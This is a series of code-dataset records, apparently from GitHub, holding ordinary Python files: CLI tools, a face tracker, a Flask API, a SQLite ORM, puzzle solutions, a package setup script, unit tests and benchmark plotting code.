def project_settings(self):\n PjQuestions.select_project[0]['choices'] = map(lambda d: d['ref'], self.env.projects)\n ref_data = prompt(PjQuestions.select_project)\n ValidationHelper.check_answers(ref_data)\n\n self.pj = Project(ref=ref_data['pj_ref'])\n pj_task = prompt(PjQuestions.project_task)['pj_task']\n ValidationHelper.check_answers(pj_task)\n if pj_task == 'delete project':\n self.delete()\n elif pj_task == 'templatify project database':\n self.templatify()\n\n def link_project(self):\n databases = self.env.list_dbs()\n PjQuestions.link[0]['choices'] = databases\n link_data = prompt(PjQuestions.link)\n ValidationHelper.check_answers(link_data)\n self.env.link_project(\n project=Project(\n ref=link_data['install_ref'],\n name=link_data['install_name'],\n database=link_data['database_name'])\n )\n self.main()\n\n def delete(self):\n delete_tasks = prompt(PjQuestions.delete)\n ValidationHelper.check_answers(delete_tasks)\n keep_db = delete_tasks['keep_db']\n confirmation = delete_tasks['confirmation']\n if confirmation:\n self.env.delete_project(\n project=self.pj,\n keep_db=keep_db\n )\n self.main()\n\n def templatify(self):\n pj_data = self.env.get_project(self.pj.ref_name)\n print(pj_data)\n ValidationHelper.check_answers(pj_data)\n self.pj = Project(\n ref=pj_data['ref'],\n name=pj_data['name'],\n database=pj_data['database']\n )\n self.env.templatify_project(self.pj)\n self.main()\n\n\n\nif __name__ == '__main__':\n CommandEnv()\n # CommandPj(Environment('testenv'))\n","repo_name":"LUMC/directus-manager","sub_path":"Command.py","file_name":"Command.py","file_ext":"py","file_size_in_byte":9566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70632830312","text":"import argparse\nimport cv2\nimport random\nimport time\n\ndef main():\n i = 0\n parser = argparse.ArgumentParser(description='Detect face in video or webcam')\n parser.add_argument('--video', help='Video source')\n parser.add_argument('--out', help='Output video path')\n parser.add_argument('--skipframe', nargs='?', const=True, \n help='Skip frame when do not keep up frames of video')\n parser.add_argument('--waitframe', nargs='?', const=True, \n help='Wait frame when process faster frames of video')\n args = parser.parse_args()\n is_skipframe = args.skipframe\n is_waitframe = args.waitframe\n output_path = args.out\n if args.video is not None:\n capture = cv2.VideoCapture(args.video)\n else:\n capture = cv2.VideoCapture(0)\n face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n height_orig = capture.get(cv2.CAP_PROP_FRAME_HEIGHT)\n width_orig = capture.get(cv2.CAP_PROP_FRAME_WIDTH)\n frame_duration = 1/capture.get(cv2.CAP_PROP_FPS)\n #The deisred output width and height\n width = 600\n scale = width/width_orig\n rectangle_color = (0,165,255)\n face_tracker = {}\n frame_counter = 0\n face_count = 0\n skip_frame = 0\n base_tracker = cv2.TrackerKCF_create\n # base_tracker = cv2.TrackerMOSSE_create\n output_size = (775, 600)\n if output_path is not None:\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(output_path,fourcc, 1/frame_duration, output_size)\n while capture.isOpened():\n #Retrieve the latest image from the webcam\n start_frame_time = time.time()\n rc,full_size_base_image = capture.read()\n if skip_frame > 0:\n skip_frame -= 1\n continue\n frame_counter += 1\n #Resize the image to 640x480\n base_image = cv2.resize(full_size_base_image, None, fx=scale, fy=scale)\n pressed_key = cv2.waitKey(2)\n if pressed_key == ord('q'):\n capture.release()\n cv2.destroyAllWindows()\n exit(0)\n result_image = base_image.copy()\n gray = cv2.cvtColor(base_image, cv2.COLOR_BGR2GRAY)\n # gray = cv2.cvtColor(full_size_base_image, cv2.COLOR_BGR2GRAY)\n\n tracker_to_del = []\n bboxes = []\n for fid in face_tracker.keys():\n ok, bbox = face_tracker[fid].update(base_image)\n if ok:\n bboxes.append((fid, bbox))\n else:\n tracker_to_del.append(fid)\n for fid in tracker_to_del:\n del face_tracker[fid]\n \n # scale factor = 1.3: Parameter specifying how much the image size is reduced at each image scale.\n # minNeighbors = 5 Parameter specifying how many neighbors each candidate rectangle\n # should have to retain it.\n if frame_counter % 3 == 0:\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for x, y, w, h in faces:\n x_center = x + 0.5*w\n y_center = y + 0.5*h\n fid_match = None\n for fid, bbox in bboxes:\n x_tracked, y_tracked, w_tracked, h_tracked = bbox\n x_center_tracked = x_tracked + 0.5*w_tracked\n y_center_tracked = y_tracked + 0.5*h_tracked\n if x_tracked < x_center < x_tracked + w_tracked \\\n and y_tracked < y_center < y_tracked + h_tracked \\\n and x < x_center_tracked < x + w \\\n and y < y_center_tracked < y + h:\n fid_match = fid\n break\n if fid_match is None:\n new_tracker = base_tracker()\n new_tracker.init(base_image, (x, y, w, h))\n face_count += 1\n face_tracker[face_count] = new_tracker\n bboxes.append((face_count, (x, y, w, h)))\n else:\n new_tracker = base_tracker()\n new_tracker.init(base_image, (x, y, w, h))\n face_tracker[fid_match] = new_tracker\n for fid, (x, y, w, h) in bboxes:\n cv2.rectangle(result_image, (int(x), int(y)), (int(x + w), int(y + h)), rectangle_color, 2)\n if pressed_key == ord('f'):\n i += 1\n cv2.imwrite('./fail_detect/img_{}.jpg'.format(i), full_size_base_image)\n cv2.imwrite('./fail_detect/img_{}_fail.jpg'.format(i), result_image)\n print('fail saved')\n large_result = cv2.resize(result_image, output_size)\n\n #Finally, we want to show the images on the screen\n # cv2.imshow(\"base-image\", base_image)\n cv2.imshow(\"video\", large_result)\n end_frame_time = time.time()\n process_time = end_frame_time - start_frame_time\n if process_time < frame_duration:\n if is_waitframe:\n time.sleep(frame_duration - process_time)\n elif is_skipframe:\n is_skipframe = int(process_time/frame_duration) - 1\n if output_path is not None:\n out.write(large_result)\nif __name__ == '__main__':\n main()","repo_name":"dangvu5998/Face-detection-tracking","sub_path":"face_detection_tracking.py","file_name":"face_detection_tracking.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1710255396","text":"import yaml\nfrom grafanalib.core import (\n Alert, AlertCondition, Dashboard, Graph,\n GreaterThan, OP_AND, OPS_FORMAT, Row, Column, RTYPE_SUM, SECONDS_FORMAT,\n SHORT_FORMAT, single_y_axis, Target, TimeRange, YAxes, YAxis\n)\n\nnodes=[]\n\nwith open(\"nodelist.yaml\", 'r') as stream:\n nodes = yaml.safe_load(stream)\n\ndashboard = Dashboard(\n title=\"Agents\",\n uid=__file__.split('/')[-1:][0].replace('.py', ''),\n rows=[\n Row(panels=[\n Graph(\n title=\"{}\".format(i),\n dataSource='Prometheus',\n targets=[\n Target(\n expr='process_resident_memory_bytes{{job=\"all\",instance=\"{}\"}}'.format(i),\n refId='A',\n ),\n ],\n )\n ]) for i in nodes\n ],\n).auto_panel_ids()\n","repo_name":"btwiuse/k0s","sub_path":"grafana/panels/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21994956290","text":"# ***Greedily Increasing Subsequence Solution***\n# Difficulty: 2.0\n# Time Limit: 5 seconds, Memory Limit: 1024 MB\n# CPU Time: 0.33 s\n# Author: Johan Sannemo\n# Source: HiQ Challenge 2017\n# Link: https://open.kattis.com/problems/greedilyincreasing\n\n\nn = int(input())\nnums = list(map(int, input().split()))\ngis = [nums[0]]\nfor i in range(1, n):\n if nums[i] > gis[-1]:\n gis.append(nums[i])\nprint(len(gis))\nprint(\" \".join([str(x) for x in gis]))\n","repo_name":"ahmedsiad/kattis-solutions","sub_path":"greedilyincreasing/greedilyincreasing.py","file_name":"greedilyincreasing.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26833211898","text":"import sqlite3\nfrom typing import List\n\nfrom malory.classes.room import Room\nfrom malory.orm.active_unit_orm import get_player\nfrom malory.orm.user_orm import get_user_name\nfrom settings import DB_LOCATION\n\n\ndef get_available_rooms() -> List[Room]:\n \"\"\"Returns all rooms that can be joined to\"\"\"\n with sqlite3.connect(DB_LOCATION) as conn:\n c = conn.cursor()\n c.execute(\"SELECT name, points, player1_id FROM rooms WHERE player2_id IS NULL\")\n lst = c.fetchall()\n return [Room(name, points, get_player(get_user_name(idx))) for (name, points, idx) in lst]\n\n\ndef get_room(room_name: str) -> Room:\n \"\"\"Returns a room by name, throwing AttributeError if not found\"\"\"\n with sqlite3.connect(DB_LOCATION) as conn:\n c = conn.cursor()\n c.execute(\"SELECT name, points, player1_id, player2_id FROM rooms WHERE name = ?\", (room_name,))\n tup = c.fetchone()\n if not tup:\n raise AttributeError(f\"Room {room_name} was not found\")\n name, points, player1_id, player2_id = tup\n player1 = get_player(get_user_name(player1_id))\n player2 = None if player2_id is None else get_player(get_user_name(player2_id))\n return Room(name, points, player1, player2)\n\n\ndef join_room(room_name: str, idx: int) -> None:\n \"\"\"Adds a player to a room, throwing AttributeError if room is full or not found\"\"\"\n with sqlite3.connect(DB_LOCATION) as conn:\n username = get_user_name(idx)\n room = get_room(room_name)\n if not not room.player2:\n raise AttributeError(\"Room is full\")\n if room.player1.idx == idx:\n raise AttributeError(f\"Player {username} is already in room {room.name}\")\n conn.execute(\"UPDATE rooms SET player2_id=? WHERE name=?\", (idx, room_name))\n conn.commit()\n\n\ndef create_room(room_name: str, points: int, idx: int) -> None:\n \"\"\"Creates a room in the database\"\"\"\n with sqlite3.connect(DB_LOCATION) as conn:\n get_user_name(idx)\n try:\n conn.execute(\"INSERT INTO rooms(name, points, player1_id) VALUES(?,?,?)\", (room_name, points, idx))\n conn.commit()\n except sqlite3.IntegrityError:\n raise AttributeError(f\"Room name {room_name} is already taken\")\n\n\ndef leave_room(room_name: str, idx: int) -> None:\n \"\"\"Removes a player from a room, throwing AttributeError if not in room\"\"\"\n with sqlite3.connect(DB_LOCATION) as conn:\n username = get_user_name(idx)\n room = get_room(room_name)\n if room.player1.idx == idx:\n conn.execute(\"DELETE FROM rooms WHERE name=?\", (room_name,))\n conn.commit()\n if room.player2:\n create_room(room.name, room.points, room.player2.idx)\n elif room.player2 and room.player2.idx == idx:\n conn.execute(\"UPDATE rooms SET player2_id=NULL WHERE name=?\", (room_name,))\n conn.commit()\n else:\n raise AttributeError(f\"Player {username} is not in room named {room.name}\")\n","repo_name":"ItayElf/Malory-backend","sub_path":"malory/orm/room_orm.py","file_name":"room_orm.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44304931454","text":"'''\n@author: xky\n'''\nfrom .lexer import *\nfrom .Token import Token, TokenType\nfrom .Keyword import KEYWORD_MAP\nfrom .punc import SINGLE_PUNC_MAP\nfrom config import *\n\n\ndef gen_tokens(input_c_file=''):\n tokens_txt=''\n # 清洗数据转换为想要的表达式\n with open(input_c_file, encoding='utf8') as c_file:\n lexer = Lexer(c_file.read())\n with open(token_file, mode='w', encoding='utf8') as tokens_file:\n for token in lexer.lex():\n tokens_file.write(str(token) + '\\n')\n tokens_txt+=(str(token) + '\\n')\n return tokens_txt\n\ndef gen_input_str():\n input_str1 = ''\n source_str = ''\n with open(token_file, mode='r', encoding='utf8') as tokens_file:\n for line in tokens_file.readlines():\n line = line.strip('\\n')\n token = int(line.split(', ')[0])\n word = line.split(', ')[1]\n # 跳过注释和分号\n if word == ';' or token == TokenType.Comment:\n continue\n elif word in KEYWORD_MAP.keys():\n # 关键字KEYWORD_MAP,if,return,int\n if word == 'if':\n input_str1 += 'i'\n elif word == 'return':\n input_str1 += 'r'\n else:\n input_str1 += 'k'\n # 变量名 Identifier\n elif token == TokenType.Identifier[0]:\n if word == 'main':\n input_str1 += 'm'\n else:\n input_str1 += 'v'\n # 变量名 符号栈\n elif word in SINGLE_PUNC_MAP.keys():\n input_str1 += word\n elif token == TokenType.NumericLiteral[0]:\n input_str1 += 'd'\n source_str += ' ' + word\n source_str = source_str.strip()\n input_str1 += '#'\n # , 如果是cmp,<,>符号就变为c。\n # input_str1=input_str1.replace('<','c')\n print(source_str)\n print(input_str1)\n with open(input_str_file, mode='w', encoding='utf8') as f:\n f.write(input_str1)\n with open(input_source_file, mode='w', encoding='utf8') as f:\n f.write(source_str)\n","repo_name":"wscjxky/zuoye","sub_path":"compiler/lab06/lexer/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26801257387","text":"from flask import jsonify, url_for, request, g, abort\nfrom app import db\nfrom app.models import Usuario\nfrom app.api.v1 import bp\nfrom app.api.v1.errores import peticion_erronea\nfrom app.api.v1.auth import token_auth\nfrom app.api.v1.firebase import Firebase\n\n\n\n'''\n End point: Obtener usuario\n @param: URL => idUsuario, id del usuario.\n @return: Response => datos del usuario en formato JSON.\n'''\n@bp.route('/usuarios/', methods=['GET'])\n@token_auth.login_required\ndef obtener_usuario(idUsuario):\n return jsonify(Usuario.query.get_or_404(idUsuario).to_dict())\n\n\n'''\n End point: Crear usuario.\n @param: Body => datos del usuario a crear en formato JSON.\n @return: Response => datos del usuario creado en formato JSON.\n'''\n@bp.route('/usuarios', methods=['POST'])\ndef crear_usuario():\n datos = request.get_json() or {}\n if 'correo' not in datos or 'alias' not in datos or 'contrasena' not in datos:\n return peticion_erronea('Debe incluir los campos correo electrónico, contraseña y alias.')\n if Usuario.query.filter_by(correo=datos['correo']).first():\n return peticion_erronea('Ya hay un usuario con esa dirección correo de correo electrónico, por favor utilice una dirección de correo electrónico diferente.')\n datos['idUsuario'] = Firebase.firebase_crear_usuario(datos)\n usuario = Usuario()\n usuario.from_dict(datos, nuevo_usuario=True)\n db.session.add(usuario)\n db.session.commit()\n respuesta = jsonify(usuario.to_dict())\n respuesta.status_code = 201\n respuesta.headers['Location'] = url_for(\n 'api.obtener_usuario', idUsuario=usuario.idUsuario)\n return respuesta\n\n'''\n End point: Actualizar usuario.\n @param: URL => idUsuario, id del usuario.\n @param: Body => datos del usuario a actualizar en formato JSON.\n @return: Response => datos del usuario actualizado en formato JSON.\n'''\n@bp.route('/usuarios/', methods=['PUT'])\n@token_auth.login_required\ndef actualizar_usuario(idUsuario):\n if g.usuario_actual.idUsuario != idUsuario:\n abort(403)\n usuario = Usuario.query.get_or_404(idUsuario)\n datos = request.get_json() or {}\n if 'idUsuario' in datos:\n return peticion_erronea('No se puede cambiar el id del Usuario.')\n if 'correo' in datos and datos['correo'] != usuario.correo and \\\n Usuario.query.filter_by(correo=datos['correo']).first():\n return peticion_erronea('Por favor, use otra dirección de correo electrónico.')\n if 'alias' in datos and datos['alias'] != usuario.alias and \\\n Usuario.query.filter_by(alias=datos['alias']).first():\n return peticion_erronea('Por favor, use otro alias.')\n usuario.from_dict(datos, nuevo_usuario=False)\n Firebase.firebase_actualizar_usuario(usuario)\n db.session.commit()\n return jsonify(usuario.to_dict())\n","repo_name":"GuillermoGarcia/avispro-api","sub_path":"app/api/v1/usuarios.py","file_name":"usuarios.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12927566246","text":"import csv\nfrom sys import argv\n\ndef main():\n\n #check for correct number of arguments\n if len(argv) != 3:\n print(\"Usage: python dna.py data.csv sequence.txt\")\n\n #open files\n databaseFile = open(\"./\" + argv[1])\n dnaFile = open(\"./\" + argv[2])\n\n reader = csv.DictReader(databaseFile)\n strs = reader.fieldnames[1:]\n\n\n dna = dnaFile.read()\n dnaFile.close()\n\n dna_fingerprint = {}\n for i in strs:\n dna_fingerprint[i] = repeats(i, dna)\n\n for i in reader:\n if match(strs, dna_fingerprint, i):\n print(f\"{i['name']}\")\n databaseFile.close()\n return\n \n print(\"No match\")\n databaseFile.close()\n\ndef repeats(x, dna):\n i = 0\n while x * (i + 1) in dna:\n i += 1\n return i\n \ndef match(strs, dna_fingerprint, row):\n for i in strs:\n if dna_fingerprint[i] != int(row[i]):\n return False\n return True\n\nmain()","repo_name":"daniel19e/cs50","sub_path":"pset6/dna/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19531357445","text":"import cv2\nimport numpy as np\nfrom problem_1_solver import Problem1Solver\nfrom problem_2_solver import Problem2Solver\nfrom problem_3_solver import Problem3Solver\nfrom problem_4_solver import Problem4Solver\nfrom problem_5_solver import Problem5Solver\n\ndirectory = 'GaitImages/'\nimg1 = cv2.imread(directory + '00000048.png')\nimg2 = cv2.imread(directory + '00000173.png')\n\n\ndef get_binaryImg_and_boundaries(img):\n binary_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n boundaries, _ = cv2.findContours(\n binary_img, mode=cv2.RETR_TREE, method=cv2.CHAIN_APPROX_SIMPLE)\n boundaries = np.array(boundaries[0])\n return binary_img, boundaries\n\n\nprint(\"solving problem 1 ... ...\")\np1 = Problem1Solver()\np1.solve(img1)\np1.solve(img2)\n\nprint(\"solving problem 2 ... ...\")\np2 = Problem2Solver()\np2.solve()\n\nprint(\"solving problem 3 ... ...\")\nbinary_img, boundaries = get_binaryImg_and_boundaries(img1)\np3 = Problem3Solver(binary_img=binary_img, boundaries=boundaries)\np3.solve()\n\nprint(\"solving problem 4 ... ...\")\nbin_img1, _ = get_binaryImg_and_boundaries(img1)\nbin_img2, _ = get_binaryImg_and_boundaries(img2)\np4 = Problem4Solver()\np4.solve(bin_img1, '00000048.png')\np4.solve(bin_img2, '00000173.png')\n\nprint(\"solving problem 5 ... ...\")\np5 = Problem5Solver()\np5.solve()\n\ncv2.waitKey(0)\n","repo_name":"akabiraka/cs682_computer_vision","sub_path":"hw4/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28575358210","text":"de_dataset = ds.ImageFolderDataset(cfg.data_path,\n class_indexing={'daisy':0,'dandelion':1,'roses':2,'sunflowers':3,'tulips':4})\n\ntransform_img = CV.RandomCropDecodeResize([cfg.image_width,cfg.image_height], scale=(0.08, 1.0), ratio=(0.75, 1.333)) #改变尺寸\nhwc2chw_op = CV.HWC2CHW()\ntype_cast_op = C.TypeCast(mstype.float32)\nde_dataset = de_dataset.map(input_columns=\"image\", num_parallel_workers=8, operations=transform_img)\nde_dataset = de_dataset.map(input_columns=\"image\", operations=hwc2chw_op, num_parallel_workers=8)\nde_dataset = de_dataset.map(input_columns=\"image\", operations=type_cast_op, num_parallel_workers=8)\nde_dataset = de_dataset.shuffle(buffer_size=cfg.data_size)\n(de_train,de_test)=de_dataset.split([0.8,0.2])\n\nde_train=de_train.batch(cfg.batch_size, drop_remainder=True)\nde_train=de_train.repeat(cfg.epoch_size)\nde_test=de_test.batch(cfg.batch_size, drop_remainder=True)\nde_test=de_test.repeat(cfg.epoch_size)\nprint('训练数据集数量:',de_train.get_dataset_size()*cfg.batch_size)\nprint('测试数据集数量:',de_test.get_dataset_size()*cfg.batch_size)\n\ndata_next=de_dataset.create_dict_iterator().get_next()\nprint('通道数/图像长/宽:', data_next['image'].shape)\nprint('一张图像的标签样式:', data_next['label']) # 一共5类,用0-4的数字表达类别。\n\nplt.figure()\nplt.imshow(data_next['image'][0,...])\nplt.colorbar()\nplt.grid(False)\nplt.show()","repo_name":"Roswellii/ML_course","sub_path":"lab4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3345762037","text":"class Solution:\r\n def groupAnagrams(self, strs):\r\n dic = {}\r\n for i in strs:\r\n tmp = tuple(sorted(i))\r\n dic[tmp] = dic.get(tmp, []) + [i]\r\n res =[]\r\n for i in dic:\r\n res.append(dic[i])\r\n return res\r\n\r\n\r\nprint(Solution().groupAnagrams([\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]))\r\n","repo_name":"Hegemony/Python-Practice","sub_path":"LeetCode practice/Top 100/First/49.groupAnagrams.py","file_name":"49.groupAnagrams.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25800633878","text":"from django.contrib.auth.models import User\nfrom .models import UserData\nfrom rest_framework import serializers\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['id', 'username', 'email', 'first_name']\n\n\nclass UserDataSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserData\n fields = ['detail', 'slug']\n\n def create(self, validated_data):\n user_data = UserData.objects.update_or_create(\n user_id=validated_data.get('user_id', None),\n slug=validated_data.get('slug', None),\n defaults={'detail': validated_data.get('detail')}\n )\n return user_data\n","repo_name":"nikorgl/toddlearn","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13603759618","text":"n, k, m = map(int, input().split())\nif k < m or k > n:\n print(0)\nelse:\n details = 0\n balance = 0\n new_details = 0\n while n >= k:\n q_blanks = n // k\n mass_blanks = q_blanks * k\n balance += n - mass_blanks\n q_details = k // m * q_blanks\n new_details += q_details\n mass_details = q_details * m\n balance += q_blanks * k - mass_details\n n = balance\n balance = 0\n print(new_details)\n","repo_name":"Alset-Nikolas/Algorithm_training_1","sub_path":"июнь 2021, занятие 1/g. Детали.py","file_name":"g. Детали.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3904684946","text":"import os\nimport sys\nimport ast\nimport site\nfrom io import open\n\nfrom setuptools import setup\n\n# See https://github.com/pypa/pip/issues/7953\nsite.ENABLE_USER_SITE = \"--user\" in sys.argv[1:]\n\nself_path = os.path.dirname(os.path.realpath(__file__))\n\nwith open(\n os.path.join(self_path, \"dffml_model_scratch\", \"version.py\"), \"r\"\n) as f:\n for line in f:\n if line.startswith(\"VERSION\"):\n version = ast.literal_eval(line.strip().split(\"=\")[-1].strip())\n break\n\nwith open(os.path.join(self_path, \"README.md\"), \"r\", encoding=\"utf-8\") as f:\n readme = f.read()\n\nsetup(\n name=\"dffml-model-scratch\",\n version=version,\n description=\"\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n author=\"Yash Lamba\",\n author_email=\"yashlamba2000@gmail.com\",\n maintainer=\"John Andersen\",\n maintainer_email=\"john.s.andersen@intel.com\",\n url=\"https://github.com/intel/dffml/blob/main/model/scratch/README.md\",\n license=\"MIT\",\n keywords=[\"dffml\"],\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n ],\n entry_points={\n \"dffml.model\": [\n \"scratchlgrsag = dffml_model_scratch.logisticregression:LogisticRegression\",\n \"anomalydetection = dffml_model_scratch.anomalydetection:AnomalyModel\",\n ],\n \"dffml.accuracy\": [\n \"anomalyscore = dffml_model_scratch.anomaly_detection_scorer:AnomalyDetectionAccuracy\",\n ],\n },\n)\n","repo_name":"intel/dffml","sub_path":"model/scratch/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"72"} +{"seq_id":"14340093323","text":"import sys\nsys.path.append(\"../\")\n\nimport unittest\nimport label\n\n\n\nclass TestSequenceFunctions(unittest.TestCase):\n\n def test_create_label_functions(self):\n #inputs\n node_names = ['a', 'b', 'c']\n data = \"\"\"\n none = not a and not b and not c\n ab = a and b\n c = c\n \"\"\"\n\n functions = label.create_label_functions(node_names, data)\n self.assertEqual(functions['none']([0,0,0]), True)\n self.assertEqual(functions['ab']([1,1,0]), True)\n self.assertEqual(functions['c']([0,0,1]), True)\n self.assertEqual(functions['none']([1,0,1]), False)\n\n\n def test_label_state(self):\n #inputs\n node_names = ['a', 'b', 'c']\n data = \"\"\"\n none = not a and not b and not c\n ab = a and b\n c = c\n \"\"\"\n states = [\"000\", \"001\", \"100\", \"101\", \"110\", \"111\"]\n labels = ['none', 'c', '', 'c', 'ab', 'c/ab']\n\n functions = label.create_label_functions(node_names, data)\n for s, l in zip(states, labels):\n self.assertEqual(label.label_state(s, functions), l)\n\n\n\n\n\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"mar-esther23/regnet","sub_path":"regnet/test/test_label.py","file_name":"test_label.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31505238869","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport logging\nimport subprocess\nimport argparse\n\ndef shell(cmd, quiet=False):\n if not quiet:\n logging.debug(f' shell: {cmd}')\n result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout\n try:\n result = result.decode().strip()\n except:\n pass\n if result and not quiet:\n logging.debug(f' result: {result}')\n return result\n\ndef generate_plot_imb(datapath_native, datapath_wasm, path_to_save):\n for _, dirnames, filenames in os.walk(datapath_native):\n for dir in dirnames:\n for _, benchname, filenames in os.walk(os.path.join(datapath_native, dir)):\n for bench in benchname:\n # for file in filenames: \n logging.info(f'Benchmark: {bench}')\n for _, _, datafiles in os.walk(os.path.join(datapath_native, dir, bench)):\n # print(datafiles[0])\n df_imb_native = pd.read_csv(os.path.join(datapath_native, dir, bench, datafiles[0]), index_col=False)\n df_imb_wasm = pd.read_csv(os.path.join(datapath_wasm, dir, bench, datafiles[0]), index_col=False)\n create_dir_path = path_to_save + \"/\" + bench\n # print(create_dir_path)\n shell(f'mkdir -p {create_dir_path}')\n # print(os.path.join(datapath_native, dir, bench, datafiles[0]))\n # print(os.path.join(datapath_wasm, dir, bench, datafiles[0]))\n \n fig, ax = plt.subplots()\n ax.plot(df_imb_native['bytes'], df_imb_native['t_avg_us'], label='Native')\n ax.plot(df_imb_wasm['bytes'], df_imb_wasm['t_avg_us'], label='Wasm')\n plt.xlabel('Bytes')\n plt.ylabel('Iteration Time')\n plt.title(f'{bench}')\n plt.legend()\n save_path = create_dir_path + \"/\" + bench + \".png\"\n # print(save_path)\n plt.savefig(save_path, dpi=300) \n\n\n#Create plots for HPCG, IS, and IMB\ndef create_plots(dirpath):\n \n shell(\"mkdir -p Plots\")\n shell(\"mkdir -p Plots/HPCG\")\n shell(\"mkdir -p Plots/IS\")\n shell(\"mkdir -p Plots/IMB\")\n shell(\"mkdir -p Plots/IMB/4_proc\")\n shell(\"mkdir -p Plots/IMB/8_proc\")\n\n data_path_native = os.path.join(dirpath, \"native\")\n data_path_wasm= os.path.join(dirpath, \"wasm\")\n logging.info(f'Generating plots for HPCG')\n \n df_hpcg_native = pd.read_csv(os.path.join(data_path_native, \"HPCG/native.csv\"), index_col=False)\n df_hpcg_wasm = pd.read_csv(os.path.join(data_path_wasm, \"HPCG/wasm.csv\"), index_col=False)\n\n fig, ax = plt.subplots()\n ax.plot(df_hpcg_native['nproc'], df_hpcg_native['gflop_per_s'], label='Native')\n ax.plot(df_hpcg_wasm['nproc'], df_hpcg_wasm['gflop_per_s'], label='Wasm')\n plt.xlabel('Number of MPI Processes')\n plt.ylabel('Gflop/s')\n plt.legend()\n plt.savefig(\"Plots/HPCG/hpcg_flops.png\", dpi=300) \n \n fig, ax = plt.subplots()\n ax.plot(df_hpcg_native['nproc'], df_hpcg_native['gb_per_s'], label='Native')\n ax.plot(df_hpcg_wasm['nproc'], df_hpcg_wasm['gb_per_s'], label='Wasm')\n plt.xlabel('Number of MPI Processes')\n plt.ylabel('Bandwidth (GB/s)')\n plt.legend()\n plt.savefig(\"Plots/HPCG/hpcg_bandwidth.png\", dpi=300) \n\n logging.info(f'Generating plots for IS')\n\n df_is_native = pd.read_csv(os.path.join(data_path_native, \"IS/native.csv\"), index_col=False)\n df_is_wasm = pd.read_csv(os.path.join(data_path_wasm, \"IS/wasm.csv\"), index_col=False)\n\n # print(df_is_native)\n fig, ax = plt.subplots()\n\n ax.plot(df_is_native['nproc'], df_is_native['mop_per_s'], label='Native')\n ax.plot(df_is_wasm['nproc'], df_is_wasm['mop_per_s'], label='Wasm')\n plt.xlabel('Number of MPI Processes')\n plt.ylabel('Mop/s')\n plt.legend()\n plt.savefig(\"Plots/IS/is_mops.png\", dpi=300) \n \n logging.info(f'Generating plots for IMB')\n generate_plot_imb(os.path.join(data_path_native, \"IMB/4_proc\"), os.path.join(data_path_wasm, \"IMB/4_proc\"), \"Plots/IMB/4_proc\")\n generate_plot_imb(os.path.join(data_path_native, \"IMB/8_proc\"), os.path.join(data_path_wasm, \"IMB/8_proc\"), \"Plots/IMB/8_proc\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--dir', type=str)\n args = parser.parse_args()\n create_plots(args.dir)\n ","repo_name":"kky-fury/MPIWasm","sub_path":"wasi-mpi-rs/Plots/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"19757395544","text":"#PROBLEM 3-PYTHON\r\nimport numpy as np\r\ndef PROBLEM3(A):\r\n for n in range(len(A)):\r\n B= 